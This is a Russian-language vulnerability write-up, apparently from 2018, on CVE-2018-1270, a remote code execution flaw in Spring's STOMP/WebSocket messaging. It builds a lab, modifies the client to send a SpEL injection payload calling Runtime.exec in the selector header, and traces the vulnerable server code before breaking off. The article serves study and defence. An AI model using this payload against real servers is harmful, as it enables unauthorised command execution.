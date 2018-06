Spring — это популярнейший фреймворк для разработки на Java, на нем базируются сотни решений в самых разных областях. Тут и всевозможные веб-сайты, и энтерпрайз-сервисы, и много другого. Трудно найти серьезное приложение на Java, которое бы не использовало Spring. Недавно в нем были найдены две критические уязвимости, которые приводят к удаленному исполнению кода. Давай посмотрим, как они работают.

Первая уязвимость (CVE-2018-1270) касается модуля для работы с веб-сокетами, вторая (CVE-2018-1260) — модуля авторизации по протоколу OAuth2. Но прежде чем разбирать их, подготовим стенд для тестирования.

Стенд

Снова мои любимые стенды для Java, да еще и с модулями фреймворка, о чем еще можно мечтать? 🙂

В работе нам понадобятся:

любая операционка;

Docker;

Java 8;

Maven или другая Ant-подобная тулза для билда;

в идеале какая-нибудь IDE, но и обычный текстовый редактор сойдет.

Как ты уже понял, для каждой уязвимости нужно будет скачивать, компилировать и запускать приложения, написанные на Java. Компиляция и запуск в общем случае будет сводиться к паре команд.

$ mvn package $ java -jar target\package.jar

Если воспользуешься IDE, то процесс будет более наглядным. Я для своей работы возьму IntelliJ IDEA. Все остальные манипуляции рассмотрим по ходу разбора уязвимостей. Погнали!

RCE в модуле spring-messaging (CVE-2018-1270)

Первый баг в списке — это удаленное выполнение команд в модуле spring-messaging, который входит в стандартную поставку Spring Framework. Уязвимость, найденная 5 апреля, получила идентификатор CVE-2018-1270 и имеет статус критической. Она затрагивает все версии фреймворка из веток 4 и 5, вплоть до актуальных 4.3.14 и 5.0.4. Проблема заключается в некорректной логике обработки STOMP-сообщений (Simple/Streaming Text Oriented Message Protocol) и легко эксплуатируется удаленно.

STOMP — это специально спроектированный протокол обмена сообщениями. Он прост и основан на фреймах, подобно HTTP. Фрейм состоит из команды, необязательных заголовков и необязательного тела. Благодаря своей простоте STOMP может быть реализован поверх большого количества других протоколов, таких как RabbitMQ, ActiveMQ и других. Также можно успешно организовать работу поверх WebSockets. Именно этот способ нам интересен в рамках уязвимости, так как проблема находится в модуле spring-messaging, в реализации протокола STOMP.

Для тестирования уязвимости нам потребуется скачать примеры использования STOMP из репозитория https://github.com/spring-guides/gs-messaging-stomp-websocket. Подойдет любой коммит до 5 апреля.

$ git clone https://github.com/spring-guides/gs-messaging-stomp-websocket $ cd gs-messaging-stomp-websocket $ git checkout 6958af0b02bf05282673826b73cd7a85e84c12d3

Теперь заглянем в папку, где хранится фронтенд. Нас интересует файл app.js , а в нем — функция, которая отвечает за подключение клиента к серверу. Для этих целей здесь используется библиотека SockJS.

/gs-messaging-stomp-websocket/complete/src/main/resources/static/app.js

15: function connect() { 16: var socket = new SockJS('/gs-guide-websocket'); 17: stompClient = Stomp.over(socket); 18: stompClient.connect({}, function (frame) { 19: setConnected(true); 20: console.log('Connected: ' + frame); 21: stompClient.subscribe('/topic/greetings', function (greeting) { 22: showGreeting(JSON.parse(greeting.body).content); 23: }); 24: }); 25: }

Нам нужно добавить переменную с пейлоадом, которая будет отправляться в качестве заголовка selector при создании подключения. Для облегчения эксплуатации можно сделать это до компиляции.

15: function connect() { 16: var header = {"selector":"T(java.lang.Runtime).getRuntime().exec('calc.exe')"}; 17: var socket = new SockJS('/gs-guide-websocket'); 18: stompClient = Stomp.over(socket); 19: stompClient.connect({}, function (frame) { 20: setConnected(true); 21: console.log('Connected: ' + frame); 22: stompClient.subscribe('/topic/greetings', function (greeting) { 23: showGreeting(JSON.parse(greeting.body).content); 24: }, header); 25: }); 26: }

После этого можно откомпилировать и запустить приложение.

$ cd complete $ mvn package $ java -jar target/gs-messaging-stomp-websocket-0.1.0.jar

Согласно спецификации протокола STOMP переданные в хидере selector данные будут использоваться для фильтрации информации о подписках.

В файле DefaultSubscriptionRegistry.java имеется функция, которая отрабатывает при создании нового подключения, где генерируется новая подписка на события для этого клиента.

/org/springframework/messaging/simp/broker/DefaultSubscriptionRegistry.java

139: @Override 140: protected void addSubscriptionInternal( 141: String sessionId, String subsId, String destination, Message<?> message) { 142: 143: Expression expression = null; 144: MessageHeaders headers = message.getHeaders(); 145: String selector = SimpMessageHeaderAccessor.getFirstNativeHeader(getSelectorHeaderName(), headers); ... 160: this.subscriptionRegistry.addSubscription(sessionId, subsId, destination, expression); 161: this.destinationCache.updateAfterNewSubscription(destination, sessionId, subsId);

А если встречается хидер selector , то его содержимое интерпретируется как выражение на языке SpEL (Spring Expression Language). За его обработку отвечает функция doParseExpression класса SpelExpression .

/org/springframework/expression/spel/standard/InternalSpelExpressionParser.java

121: @Override 122: protected SpelExpression doParseExpression(String expressionString, @Nullable ParserContext context) 123: throws ParseException { 124: 125: try { 126: this.expressionString = expressionString; 127: Tokenizer tokenizer = new Tokenizer(expressionString); 128: this.tokenStream = tokenizer.process(); 129: this.tokenStreamLength = this.tokenStream.size(); 130: this.tokenStreamPointer = 0; 131: this.constructedNodes.clear(); 132: SpelNodeImpl ast = eatExpression(); 133: Assert.state(ast != null, "No node");

Здесь есть возможность вызова конструктора java.lang.Class при помощи модификатора T .

Это значит, что мы довольно просто можем создать экземпляр объекта java.lang.Runtime и выполнить произвольную команду при помощи метода exec .

Теперь, после того как селектор привязан к сообщениям, на которые подписан пользователь, можно продолжать общение с сервером, чтобы начать получать эти самые сообщения. Для этого в примере предусмотрен стандартный Hello, %username% .

Когда гость отправит имя с помощью соответствующей формы, сервер должен его поприветствовать. То есть он должен выслать ответ всем пользователям, которые подписаны на это событие. Этим занимается функция sendMessageToSubscribers , в которой выполняется метод findSubscriptions . Он находит всех адресатов, которые были подписаны на сообщения этого типа.